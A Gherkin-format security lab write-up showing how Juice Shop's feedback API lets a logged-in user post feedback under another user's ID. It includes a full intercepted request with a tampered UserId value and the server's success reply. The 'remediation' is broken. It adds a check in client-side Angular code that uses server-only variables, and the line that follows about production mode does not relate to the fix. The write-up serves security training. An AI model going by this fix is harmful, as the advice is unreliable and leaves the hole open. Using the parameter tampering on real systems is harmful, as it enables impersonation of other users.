## Version 1.4.2
## language: en

Feature:
  TOE:
    Juice-Shop
  Category:
    Broken Access Control
  Location:
    /api/Feedbacks/ - UserId (Parameter)
  CWE:
    CWE-639: Authorization Bypass Through User-Controlled Key
  Rule:
    REQ.096 Definir privilegios requeridos de usuario
  Goal:
    Post feedback in another users name
  Recommendation:
    Implement proper access control

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running Juice-Shop in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  Dev environment
    Given I see the code at "feedback.service.ts"
    """
    ...
    22  save (params) {
    23    if(params.rating > 0) {
    24      return this.http.post(this.host + '/', params).pipe(map((response: a
    ny) => response.data), catchError((err) => { throw err }))
    25    }
    26  }
    ...
    """
    Then I see it saves feedbacks directly with whatever parameters used

  Scenario: Dynamic detection
  Creating a feedback in another user's name
    Given I intercept a new feedback request with Burp
    """
    POST /api/Feedbacks/ HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: application/json, text/plain, */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/
    Authorization: Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzd
    WNjZXNzIiwiZGF0YSI6eyJpZCI6MTUsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwic
    GFzc3dvcmQiOiIzYWJmMDBmYTYxYmZhZTJmZmY5MTMzMzc1ZTE0MjQxNiIsImlzQWRtaW4iOmZhb
    HNlLCJsYXN0TG9naW5JcCI6IjAuMC4wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsI
    mNyZWF0ZWRBdCI6IjIwMTktMDItMDEgMTM6MjA6MDcuODU2ICswMDowMCIsInVwZGF0ZWRBdCI6I
    jIwMTktMDItMDEgMTM6MjA6MDcuODU2ICswMDowMCJ9LCJpYXQiOjE1NDkwMjcyMTYsImV4cCI6M
    TU0OTA0NTIxNn0.fC1w7TqHqMP2st3WN_3M0ykfSBZSQF2BSARgcmdriG-9PH2EtlpMz2AlC8-85
    qaukgZ5fs3g8E5S4ewYycHNQmzUGX9k-6EWdxBDC15ucED31yfinu68qsBjSeTP3y_38r8pzueu8
    bEVFoeeLyVs5USm1o2kISqWNz6m92Wg8oE
    X-User-Email: a@b.com
    Content-Type: application/json
    Content-Length: 66
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=6jgQrYzM3ebXAP9HLhpcnsQiP
    SoUzuZcNunh46s98IDPTL7dNKBwlak1qWO5; io=V8gS8VM_-_oqWFEwAABQ; token=eyJhbGci
    OiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MTU
    sInVzZXJuYW1lIjoiIiwiZW1haWwiOiJhQGIuY29tIiwicGFzc3dvcmQiOiIzYWJmMDBmYTYxYmZ
    hZTJmZmY5MTMzMzc1ZTE0MjQxNiIsImlzQWRtaW4iOmZhbHNlLCJsYXN0TG9naW5JcCI6IjAuMC4
    wLjAiLCJwcm9maWxlSW1hZ2UiOiJkZWZhdWx0LnN2ZyIsImNyZWF0ZWRBdCI6IjIwMTktMDItMDE
    gMTM6MjA6MDcuODU2ICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMTktMDItMDEgMTM6MjA6MDcuODU
    2ICswMDowMCJ9LCJpYXQiOjE1NDkwMjcyMTYsImV4cCI6MTU0OTA0NTIxNn0.fC1w7TqHqMP2st3
    WN_3M0ykfSBZSQF2BSARgcmdriG-9PH2EtlpMz2AlC8-85qaukgZ5fs3g8E5S4ewYycHNQmzUGX9
    k-6EWdxBDC15ucED31yfinu68qsBjSeTP3y_38r8pzueu8bEVFoeeLyVs5USm1o2kISqWNz6m92W
    g8oE

    {"UserId":15,"captchaId":0,"captcha":"-4","comment":"d","rating":5}
    """
    Then I notice the UserId parameter
    And I try modifying it to see if I can post the review as another user
    """
    {"UserId":1,"captchaId":0,"captcha":"-4","comment":"d","rating":5}
    """
    Then I get a success response
    """
    {"status":"success","data":{"id":10,"UserId":1,"comment":"d","rating":5,"upd
    atedAt":"2019-02-01T17:01:04.534Z","createdAt":"2019-02-01T17:01:04.534Z"}}
    """

  Scenario: Exploitation
  Impersonating a user
    Given I can post feedbacks as any user I want
    Then I do it to fit my particular interests

  Scenario: Remediation
  Access control
    Given I patch the code like this
    """
    ...
    22  save (params) {
    23    if(params.rating > 0) {
    24      if(req.data.userId == req.user.id) {
    25        return this.http.post(this.host + '/', params).pipe(map((response:
    any) => response.data), catchError((err) => {
    26          throw err
    27        }))
    28      }
    29    }
    30  }
    ...
    """
    Then the NODE_ENV is set to production and stacktraces aren't displayed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.5/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.0/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.0/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-31
